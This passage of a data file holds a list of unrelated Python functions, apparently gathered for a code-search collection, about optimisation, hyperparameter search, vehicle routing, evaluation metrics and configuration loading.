float(float(MAP_on_left_out)/float(len(claim_num_list))) \n avg_prec_at_5_on_left_out = float(float(avg_prec_at_5_on_left_out)/float(len(claim_num_list)))\n avg_prec_at_10_on_left_out = float(float(avg_prec_at_10_on_left_out)/float(len(claim_num_list)))\n #write res to file:\n # claim text, the best nDCG conf and result on train, the nDCG it really has, and the same for AP\n with open(measures_res+\"nDCG_AP_prec_at_k_res_of_left_out_in_its_best_conf_k_top_docs_\"+str(k_val)+\"_at_\"+str(p)+\".csv\", 'wb') as csvfile:\n w = csv.writer(csvfile)\n row = \"claim|best_nDCG|alpha,beta,lambda,delta_1,delta_2,delta_3|best_AP|alpha,beta,lambda,delta_1,delta_2,delta_3|best_prec_at_5|alpha,beta,lambda,delta_1,delta_2,delta_3|best_prec_at_10|alpha,beta,lambda,delta_1,delta_2,delta_3\"\n w.writerow([row])\n for 
(clm_num,(nDCG,AP,prec_at_5,prec_at_10)) in measures_res_of_left_out_in_its_best_conf.items():\n row = claim_dict[str(clm_num)]+\"&\"+'%.3f'%nDCG+\"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][3])\n row += \"&\"+'%.3f'%AP+\"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][3])\n row += \"&\"+'%.3f'%prec_at_5+ \"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][3])\n row += \"&\"+'%.3f'%prec_at_10+ \"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][3])\n w.writerow([row])\n w.writerow([\"avg_nDCG_on_left_out: \"+ '%.4f'%avg_nDCG_on_left_out ])\n w.writerow([\"MAP_on_left_out: \"+ '%.4f'%MAP_on_left_out])\n w.writerow([\"avg_prec_at_5_on_left_out: \"+ '%.4f'%avg_prec_at_5_on_left_out])\n w.writerow([\"avg_prec_at_10_on_left_out: \"+ '%.4f'%avg_prec_at_10_on_left_out])\n except Exception as err: \n sys.stderr.write('problem in LOO') \n print err", "def find_best(self, num_iters: int, hparams_path: str, trials_path: str) -> None:\n for _ in range(num_iters):\n try:\n trials = pickle.load(open(trials_path, \"rb\"))\n self.last_best = trials.best_trial[\"result\"][\"loss\"]\n except FileNotFoundError:\n trials = Trials()\n logger.info(\n f\"Last best from previous iteration was: {self.last_best} on \"\n f\"[{datetime.now().replace(second=0, microsecond=0)}]\"\n )\n best_hparams = space_eval(\n self.search_space,\n fmin(\n self.objective,\n self.search_space,\n algo=tpe.suggest,\n max_evals=len(trials.trials) + 1,\n show_progressbar=False,\n trials=trials,\n 
),\n )\n # Dump Trials object always\n with open(trials_path, \"wb\") as trials_file:\n pickle.dump(trials, trials_file)\n\n # Dump hparams only if better result was achieved\n if trials.best_trial[\"result\"][\"loss\"] < self.last_best:\n best_hparams[\"name\"] = self.name\n best_hparams[\"seed\"] = self.seed\n\n with open(hparams_path, \"w\") as yaml_file:\n YAML().dump(best_hparams, yaml_file)", "def greedy_initial(self):\r\n sol = [] # [[0;2;5;0;4;6;0],[],...]\r\n sol_veh_type = [] # corresponding vehicle type for the solution\r\n route_way_time = []\r\n\r\n to_vist = [i+1 for i in range(store_num - 1)] # [1,5,8,...]\r\n itr = 0\r\n\r\n while len(to_vist) > 0 and itr < 500:\r\n itr += 1\r\n\r\n if itr <= small_veh_cnt:\r\n vehicle_type0 = 2\r\n elif itr <= small_veh_cnt + medium_veh_cnt:\r\n vehicle_type0 = 3\r\n else:\r\n vehicle_type0 = 5\r\n\r\n sol_veh_type.append(vehicle_type0)\r\n\r\n used_res = [0, 0, 0, 0] # used volume, and travel time of the vehicle, leave time, travel distance\r\n veh_rout = [0]\r\n\r\n # print '\\nA new vehicle will be used.'\r\n way_time = 0 # travel time of coming to the store + wait time at the store + operation time at this store\r\n while True:\r\n curr_cust = veh_rout[-1]\r\n\r\n next_one, way_time = self.time_nn(way_time, curr_cust, to_vist, used_res, len(veh_rout), vehicle_type0)\r\n next_cust, next_start = next_one[0], next_one[1]\r\n # print('next start', next_cust, next_start)\r\n if next_cust == 0: # next visiting customer is depot\r\n # print 'Get back to the depot, and ready for a new round.'\r\n veh_rout.append(next_cust)\r\n break\r\n\r\n else: # next visiting customer is a store\r\n used_res[0] += (num_demd[next_cust][0] * bskt_vol + num_demd[next_cust][1] * trsf_vol + (num_demd[next_cust][2] + \\\r\n num_demd[next_cust][3]) * milk_vol + num_demd[next_cust][4] * paper_bskt)\r\n used_res[2] = (next_start + oprt_t)\r\n used_res[3] += dist_mat[curr_cust, next_cust]\r\n\r\n\r\n veh_rout.append(next_cust)\r\n # print 'Vehicle used resource: ', used_res\r\n to_vist.remove(next_cust)\r\n\r\n sol.append(veh_rout)\r\n route_way_time.append(way_time)\r\n\r\n # print 'Last point 0 earliest leave time: ', int(used_res[-1]) / 60, ':', int(used_res[-1]) % 60\r\n # print 'Route %s is: ' % itr, veh_rout\r\n print('*'*10, 'Iteration:', itr, '*'*10)\r\n\r\n\r\n if len(to_vist) > 0:\r\n print('number of stores remained: ', len(to_vist))\r\n\r\n return sol, sol_veh_type, route_way_time", "def combine_all_populations(folder: str,\n max_v: int = None,\n neat: bool = False,\n neat_gru: bool = False,\n neat_lstm: bool = False,\n neat_sru: bool = False,\n neat_sru_s: bool = False,\n ):\n # Collect all the populations\n populations = []\n if neat: populations.append(D_NEAT)\n if neat_gru: populations.append(D_NEAT_GRU)\n if neat_lstm: populations.append(D_NEAT_LSTM)\n if neat_sru: populations.append(D_NEAT_SRU)\n if neat_sru_s: populations.append(D_NEAT_SRU_S)\n if len(populations) == 0: return\n \n # Collect all the measure options\n OPTIONS = ['distance', 'finished', 'fitness', 'score', 'time', 'training']\n # OPTIONS = ['fitness']\n \n # Go over all possibilities\n print(f\"\\n===> COMBINING POPULATIONS OF FOLDER {folder} <===\")\n path = f\"population_backup/storage/{folder}/\"\n path_images = get_subfolder(path, 'images')\n for option in OPTIONS:\n plt.figure(figsize=(8, 2.5))\n max_data = 0\n max_gen = 0\n for pop in populations:\n # Load the dictionary\n d = load_dict(f\"{path}{pop}/evaluation/{option}\")\n size = len(list(d.values())[0])\n if max_v: assert 
size == max_v\n \n # Prepare the data containers\n q1 = []\n q2 = [] # Median\n q3 = []\n idx_q1 = int(round(1 / 4 * size))\n idx_q2 = int(round(2 / 4 * size))\n idx_q3 = int(round(3 / 4 * size))\n \n # Loop over each iteration\n x = sorted([int(k) for k in d.keys()])\n for g in x:\n if g > max_gen: max_gen = g\n lst = sorted(d[str(g)]) # Sort values from low to high\n q1.append(lst[idx_q1])\n q2.append(lst[idx_q2])\n q3.append(lst[idx_q3])\n \n # Plot the results\n plt.plot(x, q1, color=COLORS[pop], linestyle=\":\", linewidth=.5)\n plt.plot(x, q3, color=COLORS[pop], linestyle=\":\", linewidth=.5)\n plt.plot(x, q2, color=COLORS[pop], linestyle=\"-\", linewidth=2, label=pop)\n plt.fill_between(x, q1, q3, color=COLORS[pop], alpha=0.2)\n \n # Update the max-counter\n if max(q3) > max_data: max_data = max(q3)\n \n # Finalize the figure\n leg = plt.legend(loc='upper center',\n bbox_to_anchor=(0.5, 1.25),\n fancybox=True,\n fontsize=10,\n ncol=len(populations))\n for line in leg.get_lines():\n line.set_linewidth(4.0)\n # plt.xticks([i * 100 for i in range(11)]) # TODO\n plt.xlabel(\"generation\")\n plt.xlim(0, max_gen)\n # plt.yticks([i for i in range(7)]) # TODO\n plt.ylabel(option)\n plt.ylim(0, max(max_data * 1.05, 1.05))\n # plt.ylim(0, 6) # TODO\n plt.grid()\n plt.tight_layout()\n plt.savefig(f\"{path_images}comb_{option}.png\", bbox_inches='tight', pad_inches=0.02, dpi=500)\n # plt.savefig(f\"{path_images}comb_{option}.eps\", format=\"eps\", bbox_inches='tight', pad_inches=0.02)\n # plt.show()\n plt.close()", "def save_final_config(self, configuration):\n # outfile = 'passes_final.json'\n # print \"Optimal passes written to \" + outfile + \":\", configuration.data\n # self.manipulator().save_to_file(configuration.data, outfile)\n msg = \"Tuned on program {0}, with priority {1}. 
\\nBest pass ordering found:\\n{2}\".format(\n self.args.makefile, OPT_LVL, self.build_options(configuration.data))\n print msg\n self.make(\"clean\")", "def test_get_best_candidate(self):\n optimizer = \"RandomSearch\"\n name = \"test_init_experiment\"\n param_defs = {\n \"x\": MinMaxNumericParamDef(0, 1),\n \"name\": NominalParamDef([\"A\", \"B\", \"C\"])\n }\n minimization = True\n\n LAss = PrettyLabAssistant()\n LAss.init_experiment(name, optimizer, param_defs, minimization=minimization)\n cand_one = LAss.get_next_candidate(name)\n cand_one.result = 1\n LAss.update(name, cand_one)\n\n cand_two = LAss.get_next_candidate(name)\n cand_two.result = 0\n LAss.update(name, cand_two)\n\n assert_equal(cand_two, LAss.get_best_candidate(name))", "def get_winners(self):\n\n if self.optimal is not None:\n return self.optimal\n clean_proposals = self.cleaner.create_scenarios(self.proposals)\n self.optimal = self.optimizer.optimize(clean_proposals)\n return self.optimal", "def init(self):\n self.best_feas_value = self.solver.sense.worst_value\n self.worst_feas_value = self.solver.sense.best_value", "def runAlg_noPrints(self):\n alpha = self.__problem.getAlpha()\n beta = self.__problem.getBeta()\n q0 = self.__problem.getQ0()\n rho = self.__problem.getRho()\n \n bestSol= Ant(self.__n)\n \n for i in range(self.__noEpoch):\n antSol = self.iteration(alpha, beta, q0, rho)\n if antSol.evaluate() < bestSol.evaluate():\n bestSol.setSolution ( deepcopy(antSol.getSolution()) )\n if bestSol.evaluate() == 1 :\n return bestSol\n\n return bestSol", "def savings_algorithm(self):\n self.generate_trivial_tours() # generate trivial solution\n while True: # endless loop\n maxSavings = 0 # values for best savings decision\n bestr1 = None\n bestr2 = None\n for r1 in self.routes: # loop through all route combinations\n for r2 in self.routes:\n if r1 != r2:\n currentSavings = self.savings2routes(r1,r2)\n if currentSavings > maxSavings: # if the savings are greater than the so far best savings\n bestr1 = r1 # store the routes and the savings value\n bestr2 = r2\n maxSavings = currentSavings\n if (bestr1 == None): # if no savings or no feasible joins exist break out of the loop\n break\n newRoute = VRP_Route(bestr1.route+bestr2.route) # generate new route and delete old routes\n self.routes.remove(bestr1)\n self.routes.remove(bestr2)\n self.routes.append(newRoute)\n self.get_objective()\n return self.objective", "def get_best_solution(self):\n if not self.tours:\n raise Exception('No solution has been computed yet')\n scores = {s:get_cost(self.tours[s],self) for s in self.tours}\n best = min(scores,key=scores.get)\n print('The best solution is given by {} with score {}'.format(best,scores[best]))\n return self.tours[best]", "def get_station_configuration_new(stations_id, station_configuration):\n \n \"\"\" Gets the primary station_id from the station_configuration table. \n station_id is the id taken from the input file.\n First it checks if a primary_id in th estation_conf file matches the station_id, \n otherwise it looks for an element in the list of secondary ids. \n \"\"\"\n\n for s in stations_id:\n s = str(s)\n try:\n si = s.decode('utf-8')\n except:\n si = s \n #if ':' in si:\n # si = si.split(':')[1]\n \n station_id_primary = numpy.string_( '0-20000-0-' + si ) # remove the prefix to the station id \n station_id_primary_alternative = numpy.string_( '0-20001-0-' + si )\n \n \"\"\" First, check for matching primary_id. \n If not found, check for secondary id. 
Note that secondary is a list, so must loop over the entry to find a matching one \"\"\"\n \n matching_primary = station_configuration.loc[station_configuration['primary_id'] == station_id_primary ]\n matching_primary_alt = station_configuration.loc[station_configuration['primary_id'] == station_id_primary_alternative ]\n \n if len(matching_primary) > 0:\n return matching_primary \n \n elif len(matching_primary_alt) > 0 :\n return matching_primary_alt \n \n else:\n secondary = station_configuration['secondary_id'] \n \n for second in secondary:\n try: # this try is needed when the secondary ids are not defined or wrong, and the primary id cannot be matched with the station_id \n sec_list = second.decode('utf-8') # secondary ids are separated by a comma, so I loop over the list\n except:\n try:\n sec_list = str(second)\n except: \n pass\n \n #if ':' in sec_list: # might be : or C: in the secndary id , e.g. C:5852 \n # sec_list = sec_list.split(':')[1]\n \n if sec_list == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\" \n return sc \n try:\n if str(second) == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\")\n return sc \n except:\n pass \n \n return None", "def find_best_solution_and_score(self):\r\n best_score = MAXSIZE\r\n best_solution = self.simulation.solutions[0]\r\n for solution in self.simulation.solutions:\r\n score = self.simulation.fitting_function.fit_score(solution)\r\n if score < best_score:\r\n best_score = score\r\n best_solution = solution\r\n return best_solution, best_score", "def choose_bestnext(self, round):\n board_percentage = []\n \n for i in self.possible_coords:\n iSq = round.getSq(i[0], i[1])\n \n if round.pr_hook(iSq) == ' X ':\n sq_percentage = []\n surroundings = iSq.point_neighbors()\n \n for j in surroundings:\n jSq = round.getSq(j[0], j[1])\n\n if round.as_int(jSq) != None:\n count_X = 0\n count_F = 0\n check = jSq.point_neighbors()\n\n for k in check:\n kSq = round.getSq(k[0], k[1])\n if round.pr_hook(kSq) == ' X ':\n count_X += 1\n elif round.pr_hook(kSq) == ' f ':\n count_F += 1 \n if count_X != 0:\n sq_percentage.append((jSq.mine_neighbors() - count_F)/ count_X)\n\n avg_percent = 0\n if len(sq_percentage) == 0:\n avg_percent = 0.8\n elif sq_percentage.count(1) != 0:\n avg_percent = 1\n round.flagSq(i[0], i[1])\n else:\n sum_so_far = 0\n for p in sq_percentage:\n sum_so_far += p\n avg_percent = sum_so_far / len(sq_percentage)\n \n board_percentage.append(avg_percent)\n\n else:\n board_percentage.append(100)\n\n sorted_percentages = board_percentage.copy()\n sorted_percentages.sort()\n\n best_choice = board_percentage.index(sorted_percentages[0])\n\n return self.possible_coords[best_choice]", "def solve(self):\n\n tracks_copy = self.tracks.copy()\n vehicles_sorted = sorted(self.vehicles, key=lambda x: x.departure_time)\n\n vehicles_added = 0\n while len(vehicles_sorted) != 0:\n best_ratio = - sys.maxsize - 1\n best_track = None\n best_vehicle = None\n shuffle(tracks_copy)\n\n for vehicle in vehicles_sorted:\n for track in tracks_copy:\n if track.add_vehicle(vehicle, self.tracks):\n self.grader.reinitialize_grader()\n goal1 = self.grader.calculate_first_global_goal()\n goal2 = self.grader.calculate_second_global_goal()\n ratio = goal2 / goal1\n if ratio > best_ratio:\n best_ratio = ratio\n best_track = track\n best_vehicle = vehicle\n\n track.remove_last()\n\n if best_vehicle is not None and best_track is not 
None:\n vehicles_added += 1\n best_track.add_vehicle(best_vehicle, self.tracks)\n vehicles_sorted.remove(best_vehicle)\n else:\n self.grader.reinitialize_grader()\n goal1 = self.grader.calculate_first_global_goal()\n goal2 = self.grader.calculate_second_global_goal()\n if goal1 < self.optimal_gg1 and goal2 > self.optimal_gg2:\n self.optimal_gg1 = goal1\n self.optimal_gg2 = goal2\n self.optimal_tracks = self.tracks\n return False\n\n self.grader.reinitialize_grader()\n goal1 = self.grader.calculate_first_global_goal()\n goal2 = self.grader.calculate_second_global_goal()\n print(\"Success:\", goal1, goal2)\n if goal1 < self.best_gg1 and goal2 > self.best_gg2:\n self.best_gg1 = goal1\n self.best_gg2 = goal2\n self.best_tracks = self.tracks\n\n return True", "def get_station_configuration_f(stations_id, station_configuration):\n \n \"\"\" Gets the primary station_id from the station_configuration table. \n station_id is the id taken from the input file.\n First it checks if a primary_id in th estation_conf file matches the station_id, \n otherwise it looks for an element in the list of secondary ids. \n \"\"\"\n\n for s in stations_id:\n s = str(s)\n try:\n si = s.decode('utf-8')\n except:\n si = s \n if ':' in si:\n si = si.split(':')[1]\n \n station_id_primary = numpy.string_( '0-20000-0-' +si ) # remove the prefix to the station id \n station_id_primary_alternative = numpy.string_( '0-20001-0-' + si )\n \n \n \"\"\" First, check for matching primary_id. \n If not found, check for secondary id. Note that secondary is a list, so must loop over the entry to find a matching one \"\"\"\n \n matching_primary = station_configuration.loc[station_configuration['primary_id'] == station_id_primary ]\n matching_primary_alt = station_configuration.loc[station_configuration['primary_id'] == station_id_primary_alternative ]\n \n if len(matching_primary) > 0:\n return matching_primary \n \n elif len(matching_primary_alt) > 0 :\n return matching_primary_alt \n \n else:\n secondary = station_configuration['secondary_id'] \n \n for second in secondary:\n try: # this try is needed when the secondary ids are not defined or wrong, and the primary id cannot be matched with the station_id \n sec_list = second.decode('utf-8') # secondary ids are separated by a comma, so I loop over the list\n except:\n try:\n sec_list = str(second)\n except: \n pass\n \n if ':' in sec_list: # might be : or C: in the secndary id , e.g. 
C:5852 \n sec_list = sec_list.split(':')[1]\n \n if sec_list == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\" \n return sc \n try:\n if str(second) == si:\n sc = station_configuration.loc[station_configuration['secondary_id'] == second ]\n #print(\"FOUND a secondary !!!\")\n return sc \n except:\n pass \n \n return None", "def decide_next_query(self):\n for gp in self.gps:\n build_gp_posterior(gp)\n # Find the best mean values for each gp.\n best_f, best_pt, best_gain = None, None, float('-inf')\n queries = self._get_queried_pts()\n for f_idx, f_name in enumerate(self.f_names):\n gp = self.gps[f_idx]\n f_qs = queries[f_name]\n # Assemble points to draw sample from.\n low, high = zip(*self.domains[f_idx])\n rand_pts = np.random.uniform(low, high,\n (self.options.max_opt_evals, len(low)))\n samp_pts = np.vstack([f_qs, rand_pts])\n samp_vals = gp.draw_sample(samp_pts=samp_pts).ravel()\n max_prev = np.max(samp_vals[:len(f_qs)])\n best_new_idx = np.argmax(samp_vals[len(f_qs):]) + len(f_qs)\n gain = samp_vals[best_new_idx] - max_prev\n if gain > best_gain:\n best_f = f_idx\n best_pt = samp_pts[best_new_idx]\n best_gain = gain\n return best_f, best_pt", "def sarima_configs(seasonal=[1, 24, 168]):\n\n models = list()\n # define config lists\n p_params = [0, 1, 2]\n d_params = [0, 1]\n q_params = [0, 1, 2]\n t_params = ['n', 'c', 't', 'ct']\n P_params = [0, 1, 2]\n D_params = [0, 1]\n Q_params = [0, 1, 2]\n m_params = seasonal\n # create config instances\n for p in p_params:\n for d in d_params:\n for q in q_params:\n for t in t_params:\n for P in P_params:\n for D in D_params:\n for Q in Q_params:\n for m in m_params:\n cfg = [(p, d, q), (P, D, Q, m), t]\n models.append(cfg)\n return models", "def run(self):\n\n # init\n base_value = self._problem.evaluate()\n self._problem.set_as_best(base_value)\n\n # init iteration (used to count the amount of iterations)\n iteration = 0\n\n # add to data\n self._data_append(self.data, iteration, base_value, base_value)\n\n # init termination criterion\n self._termination_criterion.check_first_value(base_value)\n self._termination_criterion.start_timing()\n\n # main loop\n while self._termination_criterion.keep_running():\n\n # search the neighbourhood for the best move\n best_found_delta = self._best_found_delta_base_value\n best_found_move = None\n\n for move in self._problem.get_moves():\n\n # check quality move\n delta = self._problem.evaluate_move(move)\n\n # checks how the move alters the current state\n diff = self._diff(move)\n\n # if not in tabu list --> not similar to earlier performed\n # moves --> if delta better than old best move\n # --> becomes the best move\n\n if not self._tabu_list.contains(diff) and \\\n self._is_better(best_found_delta, delta):\n best_found_delta = delta\n best_found_move = move\n best_found_diff = diff\n\n # the best found move will be used as the next move\n # alter state problem\n base_value = base_value + best_found_delta\n\n # check if a move was found\n if best_found_move is not None:\n\n self._problem.move(best_found_move)\n\n # if better than best found --> new best_found\n if self._is_better(self._problem.best_order_value,\n base_value):\n self._problem.set_as_best(base_value)\n # log the better solution\n self._log_improvement(base_value)\n\n # add diff to tabu list\n self._tabu_list.add(best_found_diff)\n\n # add to data\n self._data_append(self.data, iteration,\n base_value, self._problem.best_order_value)\n\n 
self._termination_criterion.check_new_value(base_value)\n\n # functions _termination_criterion called\n self._termination_criterion.check_new_value(base_value)\n\n else:\n # no move found --> we're stuck --> break loop\n break\n\n iteration += 1\n self._termination_criterion.iteration_done()\n\n # last data point\n self._data_append(self.data, iteration, base_value,\n self._problem.best_order_value)\n\n # if we have data:\n # convert data to something easier to plot\n if self.data is not None:\n\n # convert to tuple of list\n data = convert_data(self.data)\n\n # make namedtuple\n DataAsLists = namedtuple(\n 'Data', ['time', 'iteration', 'value', 'best_value'])\n\n data = DataAsLists(data[0], data[1], data[2], data[3])\n\n else:\n data = None\n\n # return results\n\n Results = namedtuple('Results', ['best_order', 'best_value', 'data'])\n\n return Results(self._problem.best_order,\n self._problem.best_order_value,\n data)", "def tryEverything(g, verbose, graphname):\r\n prio = ['rku', 'random', 'BIL', 'rkd', 'cluHPS', 'rkusd', 'rkuad']\r\n placement = ['eft', 'BIM*', 'OLB', 'MET', 'DL', 'GDL']\r\n costFunction = ['mean', 'median', 'maxmax', 'minmax', 'minmin', 'maxmin']\r\n desc = ['DLS/DC', None, 'DCP']\r\n useOfBIM = [False, True]\r\n insertion = [False, True]\r\n BSA = [False, True]\r\n res: Dict[str, List[float]] = {}\r\n cnt = 0\r\n\r\n for ip, p in enumerate(prio):\r\n for ipl, pl in enumerate(placement):\r\n for ic, c in enumerate(costFunction):\r\n if p != 'BIL' or c == 'mean' or pl in ['DL', 'GDL']:\r\n for idd, d in enumerate(desc):\r\n for iu, u in enumerate(useOfBIM):\r\n for ii, i in enumerate(insertion):\r\n for ib, b in enumerate(BSA):\r\n cnt += 1\r\n name = \";\".join(map(str, [ip, ic, ipl, idd, iu, ii, ib]))\r\n\r\n # dispName = \"-\".join(map(str, [p, pl, c, d, u, i, b]))\r\n # print(\"Heuristic n°\", cnt, \"-\", dispName)\r\n # print(\"Heuristic n°\", cnt, \"-\", name)\r\n\r\n startScheduling = timeit.default_timer()\r\n try:\r\n schedule = computeSchedule(g, strategyPrio=p, costFunction=c,\r\n strategyPlacement=pl,\r\n useOfBIM=u, desc=d,\r\n insertion=i, bsa=b, verbose=verbose)\r\n verifPrec(g, schedule, verbose)\r\n endScheduling = timeit.default_timer()\r\n # print(\"Ended in :\", 1000*(endScheduling - startScheduling), \"ms\")\r\n # print(\"Ended in :\", round(1000 * (endScheduling - startScheduling),2), \"ms\")\r\n timeS = round(1000 * (endScheduling - startScheduling), 2)\r\n # print(f\"timeS : {timeS}\")\r\n if verbose:\r\n print(f\"Time : {timeS}ms\")\r\n res[name] = [round(schedule[getExitTask(g)][2], 6), timeS]\r\n except Exception as _:\r\n\r\n print(\"Error for : \" + name + \" on file \" + graphname)\r\n file = open(\"error.log\", 'a')\r\n file.write(f\"Error for {name} on file {graphname}\\n\")\r\n file.close()\r\n raise _\r\n return res\r\n return res", "def _select_configurations(self) -> typing.List[Configuration]:\n\n cs = self.scenario.cs\n params = cs.get_hyperparameters()\n\n constants = 0\n for p in params:\n if isinstance(p, Constant):\n constants += 1\n\n sobol = sobol_seq.i4_sobol_generate(len(params) - constants, self.init_budget)\n\n return self._transform_continuous_designs(design=sobol,\n origin='Sobol',\n cs=cs)", "def config_params0(data,parameter):\n model = []\n #Range of value of p\n acf = sm.graphics.tsa.acf(data.diff().dropna())\n for i in range(len(acf)):\n acf[i] = abs(acf[i]*10)\n if (ceil(acf[i])) <= 2:\n p = range(ceil(acf[i])-1,ceil(acf[i])+2)\n break\n\n #range of value of q\n pacf = sm.graphics.tsa.pacf(data.diff().dropna())\n 
for i in range(len(pacf)):\n pacf[i] = abs(pacf[i]*10)\n if (ceil(pacf[i])) <= 2:\n q = range(ceil(pacf[i])-1,ceil(pacf[i])+2)\n break\n\n\t# define config lists\n p_params = p\n d_params = parameter['d']\n q_params = q\n m_params = parameter['m']\n #P_params = p\n #D_params = [0, 1]\n #Q_params = q\n \n pdq_m = list(itertools.product(p_params, d_params, q_params,m_params)) #Generate all different combinations of p, q and q triplets\n params = [[(x[0], x[1], x[2]),(x[0], x[1], x[2], x[3])] for x in pdq_m]\n return params", "def get_configs():\n global configs, sensors, config_curr_location, config_max_temperature\n global config_min_temperature, config_temperature_measurement\n global config_sunrise, config_sunset, config_gpio_heater\n global config_gpio_light, config_night_max_temperature, heaterRecoveryTime\n global config_tomorrow_sunrise, config_tomorrow_sunset\n global desc_curr_location, desc_max_temperature\n global desc_min_temperature, desc_temperature_measurement\n global desc_sunrise, desc_sunset, desc_gpio_heater\n global desc_gpio_light, desc_night_max_temperature, desc_heaterRecoveryTime\n global desc_tomorrow_sunrise, desc_tomorrow_sunset, desc_tempSunrise, desc_tempSunset\n\n configs.clear()\n configs = t.get_config_values()\n for c in configs:\n if c[\"name\"] == \"Max Temperature\":\n config_max_temperature = c[\"value\"]\n desc_max_temperature = c[\"comment\"]\n\n if c[\"name\"] == \"Min Temperature\":\n config_min_temperature = c[\"value\"]\n desc_min_temperature = c[\"comment\"]\n\n if c[\"name\"] == \"Temperature Measurement\":\n config_temperature_measurement = c[\"value\"]\n desc_temperature_measurement = c[\"comment\"]\n\n if c[\"name\"] == \"Location\":\n config_curr_location = c[\"value\"]\n desc_curr_location = c[\"comment\"]\n\n if c[\"name\"] == \"Heater GPIO\":\n config_gpio_heater = int(c[\"value\"])\n desc_gpio_heater = c[\"comment\"]\n\n if c[\"name\"] == \"Light GPIO\":\n config_gpio_light = int(c[\"value\"])\n desc_gpio_light = c[\"comment\"]\n\n if c[\"name\"] == \"Night Time Max Temperature\":\n config_night_max_temperature = c[\"value\"]\n desc_night_max_temperature = c[\"comment\"]\n\n if c[\"name\"] == \"Heater Recovery Time\":\n heaterRecoveryTime = c[\"value\"]\n desc_heaterRecoveryTime = c[\"comment\"]\n\n if c[\"name\"] == \"Sunrise\":\n tempSunrise = c[\"value\"]\n desc_tempSunrise = c[\"comment\"]\n\n if c[\"name\"] == \"Sunset\":\n tempSunset = c[\"value\"]\n desc_tempSunset = c[\"comment\"]\n\n debug_logging(\"Information\", \"Retrieving latest sensor\")\n #sensors.clear()\n #sensors = t.get_sensors()\n #for s in sensors:\n #debug_logging(\n #\"Information\",\n #(\n #\"Added Sensor ID: {0}, Sensor Name: {1}, Device ID: {2}\"\n #.format(s[\"id\"], s[\"name\"], s[\"folder_id\"])\n #)\n #)\n\n if(config_curr_location != \"\"):\n curr_lat, curr_long = t.get_location_lat_long(config_curr_location)\n ro = SunriseSunset(datetime.now(), latitude=curr_lat, longitude=curr_long, localOffset=9.5)\n rise_time, set_time = ro.calculate()\n config_sunrise = rise_time.strftime(\"%I:%M %p\")\n config_sunset = set_time.strftime('%I:%M %p')\n\n debug_logging(\"Information\",\n (\"The sun will rise at {0} and will set at {1} for the lcation {2}, {3}\"\n .format(rise_time.strftime(\"%I:%M %p\"), set_time.strftime('%I:%M %p'), curr_lat, curr_long)))\n\n ro = SunriseSunset(datetime.now() + timedelta(days=1),\n latitude=curr_lat, longitude=curr_long, localOffset=9.5)\n rise_time, set_time = ro.calculate()\n config_tomorrow_sunrise = rise_time.strftime(\"%I:%M 
%p\")\n config_tomorrow_sunset = set_time.strftime('%I:%M %p')\n else:\n config_sunrise = tempSunrise\n config_sunset = tempSunset\n\n debug_logging(\"Information\",\n (\"No location value retrieved from database, using database sunrise ({0}) and sunset ({1}) values\"\n .format(tempSunrise, tempSunset)))", "def __return_best_hotspot(self, dup_dict):\n hotspots = dup_dict[dup_dict.keys()[0]]\n fewest_alt_alleles = 10\n\n hotspot_with_fewest_alleles = []\n for hotspot in hotspots:\n if len(hotspot['ALT']) < fewest_alt_alleles:\n fewest_alt_alleles = len(hotspot['ALT'])\n\n del hotspot_with_fewest_alleles[:]\n hotspot_with_fewest_alleles = []\n hotspot_with_fewest_alleles.append(hotspot)\n elif len(hotspot['ALT']) == fewest_alt_alleles:\n hotspot_with_fewest_alleles.append(hotspot)\n\n if len(hotspot_with_fewest_alleles) == 1:\n best_hotspot = hotspot_with_fewest_alleles[0]\n return best_hotspot['CHROM'], best_hotspot['POS'], best_hotspot['REF'], \",\".join(best_hotspot['ALT'])\n\n # Now checking for the highest number of variants 